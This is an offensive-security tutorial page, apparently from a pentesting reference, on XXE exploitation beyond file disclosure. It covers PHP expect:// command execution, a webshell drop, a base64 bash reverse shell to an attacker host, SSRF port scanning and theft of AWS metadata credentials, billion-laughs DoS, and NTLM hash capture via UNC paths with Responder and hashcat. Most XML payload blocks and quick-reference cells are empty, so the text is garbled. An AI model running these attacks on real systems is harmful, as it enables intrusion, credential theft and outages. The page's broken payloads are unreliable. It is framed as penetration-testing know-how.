# RCE and SSRF > XXE primitives beyond file disclosure - PHP expect:// wrapper for direct command execution and webshell drop, internal port scanning via SSRF over external entities, the billion-laughs entity expansion DoS pattern (and why modern parsers prevent it), and Windows UNC path abuse for NTLM hash theft against attacker-controlled SMB shares. ## TL;DR XXE isn't only about file reads. Four additional primitives depending on parser and target: ``` # 1. PHP expect:// for direct RCE (requires expect module loaded - uncommon) # 2. SSRF - make the parser fetch internal URLs # 3. Billion laughs DoS (often blocked in modern parsers) (recursive expansion, 10^N total) # 4. Windows UNC path → NTLM hash to attacker-controlled SMB ``` Success indicator depends on path: shell on the target (RCE), internal service response leaked back via reflection or OOB (SSRF), target's response slow/error/crash (DoS), or a Responder/SMB capture of the target's NTLM hashes. ## RCE via PHP expect:// The `expect://` wrapper is part of PHP's `pecl-expect` extension. When loaded, it executes commands on the host: ```xml ]> &xxe; ``` If `expect` is loaded, the response includes the output of `id`: ``` Thanks uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` That's immediate RCE. ### The reality check PHP `expect` is **not enabled by default** on any modern PHP install. It's a manually-installed PECL extension, and most distros don't include it in their default packages. In a real engagement, expect-enabled targets are rare - when you find one, it's usually a legacy app or a deliberately weakened lab environment. Always test for it even though it's rare - the cost is one extra payload and the payoff is full RCE in a single shot. ### Detecting expect support ```xml ``` If the response contains the output of `id`, expect is loaded. If it returns empty, an error, or "wrapper not supported," it's not. Either way, move on. ### Crafting expect commands Two constraints on what you can pass to `expect://`: 1. **XML reserved characters**: `<`, `>`, `&`, `"`, `'` will break the XML if used in the command without entity-encoding. Avoid them. 2. **URL syntax**: characters with URL-special meaning (`?`, `#`, `&`, spaces) get parsed weirdly. Spaces in particular usually break the wrapper. The standard workaround for spaces is `$IFS` (the shell's Internal Field Separator, which defaults to space/tab/newline): ```xml ``` Expands to: `curl -O 'http://attacker:8000/shell.php'` For more complex commands, base64-encode and pipe to `bash`: ```shell $ echo 'bash -c "/bin/bash -i >& /dev/tcp/attacker/4444 0>&1"' | base64 YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2F0dGFja2VyLzQ0NDQgMD4mMSIK ``` ```xml ``` Pipes (`|`) often survive in expect:// URLs but test first - some parsers URL-decode and break on `|`. ### Webshell drop pattern The cleanest single-shot RCE-to-shell pattern: ```shell # On attacker host $ echo '' > shell.php $ python3 -m http.server 8000 ``` ```xml ]> &xxe; ``` The target uses curl to download your shell.php into its own webroot. Now you have a persistent webshell: ```shell $ curl 'http://target/shell.php?cmd=id' uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` Trade-off: dropping a file is louder than one-shot RCE - but persistent shell is worth the noise in most engagements. ### What if expect isn't loaded When `expect://` isn't available, RCE through XXE alone usually isn't possible. The pivots: - **Use file disclosure to find credentials** (see [File disclosure](/codex/web/xxe/file-disclosure/)) - DB passwords in config files, SSH keys, AWS keys - **Use SSRF to reach internal services** (next section) - internal admin panels, unauthenticated metadata services, internal API endpoints - **Chain with another vulnerability** - an upload, an SSTI in a different field, an admin-only function via IDOR XXE without expect is "file read + SSRF + maybe DoS." That's still highly impactful. ## SSRF via XXE External entity URIs aren't limited to `file://`. The parser will resolve `http://` and `https://` URIs too, which makes XXE a vehicle for Server-Side Request Forgery - making the target's parser fetch URLs from the target's network perspective. ### Basic internal probe ```xml ]> &xxe; ``` If the target has an admin panel on localhost:8080 not exposed externally, this fetches its homepage. The HTML response gets reflected back through the `` field. For non-reflected variants, use the OOB pattern from [Blind exfil](/codex/web/xxe/blind-exfil/) - your listener receives the internal response. ### Internal port scanning Loop XXE payloads over a port range and observe response differences: ```shell $ for port in 22 80 443 3306 5432 6379 8080 8443 9000 11211; do response=$(curl -s -X POST http://target/api/submit \ -H 'Content-Type: application/xml' \ --data " ]> &xxe;") size=$(echo -n "$response" | wc -c) echo "Port $port: $size bytes" done ``` Patterns to look for: | Response | Likely state | | --- | --- | | Reasonable HTML/JSON content | Port open, service responded | | Empty / very small response | Port open but service didn't respond as HTTP (e.g., SSH banner) | | Connection refused error | Port closed | | Timeout | Port filtered (firewall) | Note that timing varies per parser. Some parsers wait 30+ seconds on connection timeouts - set per-request timeouts in your scanner accordingly. ### Reaching cloud metadata services The classic high-value internal target on cloud hosts: | Cloud | Metadata URL | | --- | --- | | AWS | `http://169.254.169.254/latest/meta-data/` | | AWS (IMDSv2 - requires PUT) | Token-based; harder to use XXE for | | GCP | `http://metadata.google.internal/computeMetadata/v1/` (needs `Metadata-Flavor: Google` header) | | Azure | `http://169.254.169.254/metadata/instance` (needs `Metadata: true` header) | | Oracle Cloud | `http://192.0.0.192/latest/` | ```xml ``` If the instance has an IAM role attached, this returns the role name. Follow up with: ```xml ``` Returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken). Use with `aws-cli` to operate as the instance's IAM role. GCP and Azure require headers, which XXE alone can't add - XML entity URLs don't carry headers. For metadata services that require headers, XXE can confirm reachability but not actually retrieve credentials. ### Reaching internal admin panels Beyond cloud metadata, internal admin panels are common XXE-SSRF targets: | Service | Default port | Sometimes accessible | | --- | --- | --- | | Jenkins | 8080 | `http://127.0.0.1:8080/script` (Groovy console - direct RCE) | | Tomcat manager | 8080 | `http://127.0.0.1:8080/manager/html` | | Elasticsearch | 9200 | `http://127.0.0.1:9200/_cluster/health` | | MongoDB REST | 28017 | `http://127.0.0.1:28017/` | | Redis | 6379 | Not HTTP, but some Redis configs respond to HTTP-shaped queries | | etcd | 2379 | `http://127.0.0.1:2379/v2/keys/` | | Consul | 8500 | `http://127.0.0.1:8500/v1/agent/self` | | Kubernetes API | 6443 | `https://127.0.0.1:6443/api/v1/namespaces` (usually requires auth) | Each is worth a probe - the value of finding one is high (often direct admin access on the internal service). ### SSRF protocol scope The protocols a parser supports vary: | Protocol | libxml2 (PHP) | Java SAX | .NET XmlReader | | --- | --- | --- | --- | | `file://` | Yes | Yes | Yes | | `http://`, `https://` | Yes | Yes | Yes | | `ftp://` | Yes | Sometimes | No | | `gopher://` | No | Sometimes | No | | `expect://` | If module loaded | No | No | | `jar://` | No | **Yes** | No | | `netdoc://` | No | Yes | No | Java's `jar://` protocol is particularly interesting - it fetches a JAR over HTTP and extracts a specific file from inside. Sometimes useful for blind exfil because the response timing differs from a raw HTTP fetch. ## Billion-laughs DoS The historical denial-of-service payload: ```xml ]> &a10; ``` `a10` resolves to 10 copies of `a9`, each of which is 10 copies of `a8`, ... down to `a0` which is the literal `"DOS"`. Total expansion: 10¹¹ characters = 100 GB of memory. The parser tries to materialize the string, runs out of memory, crashes. ### Why this rarely works in 2024 Every major XML parser shipped between 2012 and 2018 added protection: - **libxml2** (PHP, Python `lxml`, others): enforces a hard limit on entity expansion (10MB default since 2.9.0, configurable via `XML_PARSE_HUGE`) - **Java**: `XML_LIMIT_ENTITY_EXPANSION` system property; defaults to 64,000 expansions - **.NET**: `XmlReaderSettings.MaxCharactersFromEntities` defaults to disabled Modern targets reject the payload outright with "entity expansion limit exceeded" or just refuse to expand past the budget. Try it once on every XXE-vulnerable target to check, but expect failure. ### Quadratic blowup - the actually-still-works variant A different DoS payload bypasses entity expansion limits by using a single entity many times: ```xml ]> &a;&a;&a;&a;&a;&a;&a;...(repeated 10,000 times)...&a;&a;&a; ``` This isn't recursive - it's just 10,000 references to a 10,000-char entity, producing 100MB output. Entity-expansion limits don't catch it because there's no recursion. Parsers with no output-size limit will materialize the full 100MB and slow down. Modern parsers added output-size limits to address this, but the protection is patchier than recursive-expansion protection. Worth trying on targets where billion-laughs fails. ## Windows UNC hash theft When the target is a Windows host parsing XML with external entity support, UNC paths trigger SMB connections - and SMB connections leak NTLM hashes: ```xml ]> &xxe; ``` The parser tries to open the file via SMB. To authenticate the SMB connection, Windows sends the target service account's NTLM hash to the attacker-controlled SMB server. ### Capturing with Responder On the attacker host: ```shell $ sudo responder -I eth0 ``` Responder listens for SMB authentication attempts and captures NTLMv2 hashes: ``` [SMB] NTLMv2-SSP Client : 10.10.10.42 [SMB] NTLMv2-SSP Username : CORP\webapp_svc [SMB] NTLMv2-SSP Hash : webapp_svc::CORP:1122334455667788:... ``` Crack offline with hashcat: ```shell $ hashcat -m 5600 ntlmv2.txt rockyou.txt ``` If the service account uses a guessable password, you get plaintext credentials for a domain-joined account - direct path to lateral movement. ### Prerequisites This works when: - The XML parser supports `\\...\` UNC paths (some do, some don't) - The target's OS is Windows - The target can reach the attacker's SMB port (445/TCP) outbound - many environments firewall this, but inside-out SMB is common in less-mature setups - The XML parser runs as a domain-joined account (workstation/local accounts also work but with less downstream value) Outbound SMB from web servers is heavily monitored / firewalled in mature environments. In permissive networks (lab, internal apps, smaller orgs), this still works. ### Alternative: HTTP NTLM via UNC If outbound SMB is blocked but HTTP isn't, some Windows components negotiate NTLM over HTTP for paths that look like web shares: ```xml ``` If the parser uses Windows's URL fetching APIs (which negotiate NTLM by default for non-Internet zones), it sends NTLM auth to your HTTP server. Capture with `ntlmrelayx` or a custom listener. ## Quick reference | Primitive | Payload | | --- | --- | | RCE via expect (id check) | `` | | RCE webshell drop | `` | | SSRF localhost | `` | | SSRF internal hostname | `` | | SSRF AWS metadata | `` | | Port scan loop | bash for-loop over ports + XXE per port | | Billion-laughs DoS | Nested `` referencing `aN-1` 10 times each | | Quadratic blowup DoS | One large entity, referenced 10000+ times in body | | Windows UNC NTLM theft | `` | | Capture NTLM | `sudo responder -I eth0` | | `$IFS` for spaces in expect | `expect://curl$IFS-O$IFS'URL'` | | Detect expect loaded | Send `expect://id`; if output appears, it's loaded | | Cloud metadata services | AWS: 169.254.169.254; GCP: metadata.google.internal; Azure: 169.254.169.254 | For tool-driven automation across the various XXE primitives (blind exfil, file read, port scan), see [Automation](/codex/web/xxe/automation/).